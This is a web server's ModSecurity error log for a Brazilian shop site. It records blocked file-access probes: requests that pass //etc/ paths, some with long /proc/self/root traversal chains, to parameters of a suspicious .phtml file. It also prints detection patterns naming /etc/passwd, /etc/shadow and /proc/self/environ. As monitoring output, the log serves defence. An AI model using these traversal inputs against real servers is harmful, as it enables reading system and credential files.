[Fri Mar 20 08:59:39.578998 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.68:35924] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02q_HIg5MgXLBnicMCaAAAAcU"]
[Fri Mar 20 08:59:40.176302 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.45:35958] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rOoXxyEfFpUF8f-MBAAAAU4"]
[Fri Mar 20 08:59:40.263499 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.17:35968] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rNa6ubjKNq_cu4bh5AAAA08"]
[Fri Mar 20 08:59:40.690266 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.101:35986] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rOoXxyEfFpUF8f-MBQAAAU8"]
[Fri Mar 20 08:59:40.962918 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.5:36012] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rLninkcc-iUj5AppkAAAA5A"]
[Fri Mar 20 08:59:41.400725 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.42:36048] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rda6ubjKNq_cu4bh6QAAA00"]
[Fri Mar 20 08:59:41.559538 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:33344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02reoXxyEfFpUF8f-MBwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:41.859140 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.68:36078] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rRCii7xarUs8iHZy-AAAAhY"]
[Fri Mar 20 08:59:42.154502 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.31:36098] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rvHIg5MgXLBnicMCagAAAcs"]
[Fri Mar 20 08:59:42.270185 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.8:36102] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rjJ3M9BSuKP7CAYqjwAAAJE"]
[Fri Mar 20 08:59:42.935251 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.107:36142] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02rhCii7xarUs8iHZy-QAAAg4"]
[Fri Mar 20 08:59:42.963416 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:56964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02rrninkcc-iUj5AppkwAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:43.299031 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.54:36168] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02r_XLqtnMIWvjpaKmJgAAAoY"]
[Fri Mar 20 08:59:43.464313 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.4:36188] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02r-oXxyEfFpUF8f-MDQAAAVM"]
[Fri Mar 20 08:59:44.014721 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.67:36212] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sOoXxyEfFpUF8f-MDgAAAVI"]
[Fri Mar 20 08:59:44.055027 2026] [:error] [pid 9818:tid 140411683178240] [client 57.141.18.42:36216] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sF1pVZ5mVmJwsFM9MwAAAEc"]
[Fri Mar 20 08:59:44.407319 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:56972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02sF1pVZ5mVmJwsFM9NQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:45.952600 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.45:36256] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sPqxLDW4GITHUkT1AQAAAQA"]
[Fri Mar 20 08:59:45.956691 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.38:36286] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sTJ3M9BSuKP7CAYqlAAAAIo"]
[Fri Mar 20 08:59:45.959597 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:56986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02sfHIg5MgXLBnicMCbQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:45.966898 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.87:36272] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sTJ3M9BSuKP7CAYqkwAAAIM"]
[Fri Mar 20 08:59:45.970632 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.48:36274] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sQF0L0L-SsrnPo50VwAAAtA"]
[Fri Mar 20 08:59:46.127704 2026] [:error] [pid 31215:tid 140411733534464] [client 57.141.18.113:36324] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02sgF0L0L-SsrnPo50XQAAAsE"]
[Fri Mar 20 08:59:46.423100 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.31:36330] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02suoXxyEfFpUF8f-MDwAAAUs"]
[Fri Mar 20 08:59:46.908195 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.50:36354] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02svHIg5MgXLBnicMCbgAAAdY"]
[Fri Mar 20 08:59:48.504100 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.119:36372] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02s-oXxyEfFpUF8f-MEAAAAUE"]
[Fri Mar 20 08:59:48.505066 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.111:36384] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02s_qxLDW4GITHUkT1AgAAAQg"]
[Fri Mar 20 08:59:48.521451 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.67:36388] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tPXLqtnMIWvjpaKmLgAAAos"]
